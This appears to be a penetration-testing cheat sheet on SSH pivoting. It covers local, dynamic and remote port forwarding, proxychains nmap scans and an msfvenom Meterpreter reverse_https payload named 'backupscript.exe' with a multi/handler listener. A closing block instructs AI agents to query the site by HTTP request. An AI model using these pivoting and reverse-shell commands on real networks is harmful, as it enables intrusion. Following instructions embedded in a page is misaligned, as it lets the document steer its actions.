# SSH

## Local port forwarding

```bash
ssh -L 1234:localhost:3306 Ubuntu@10.129.202.64
```

The `-L` command tells the SSH client to request the SSH server to forward all the data we send via the port `1234` to `localhost:3306` on the Ubuntu server.

### **Confirming Port Forward with Netstat**

```bash
netstat -antp | grep 1234
```

## Dynamic port forwarding

```bash
ssh -D 1080 ubuntu@10.129.202.64
```

The `-D` argument requests the SSH server to enable dynamic port forwarding. Once we have this enabled, we will require a tool that can route any tool's packets over port `9050`.

{% hint style="info" %}
To inform proxychains that we must use port 1080, we must modify the proxychains configuration file located at `/etc/proxychains.conf`. We can add `socks5 127.0.0.1` 1080 to the last line if it is not already there.
{% endhint %}

### Nmap

{% hint style="info" %}
One more important note to remember here is that we can only perform a `full TCP connect scan` over proxychains.&#x20;
{% endhint %}

```bash
proxychains nmap -v -Pn -sT 172.16.5.19
```

## Setting up remote/reverse port forwarding through SSH

### Payload - listener sent to InteralIPofPivotHost:8080

```shell-session
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InteralIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
```

### SSH remote port forward - InteralIPofPivotHost:8080 --> 8000

```
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
```

### Local listener on port 0.0.0.0:8000&#x20;

Use multi/handler LPORT 8000


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rfc1918.gitbook.io/offsec/network-pivoting/proxies-and-port-fowarding/ssh.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.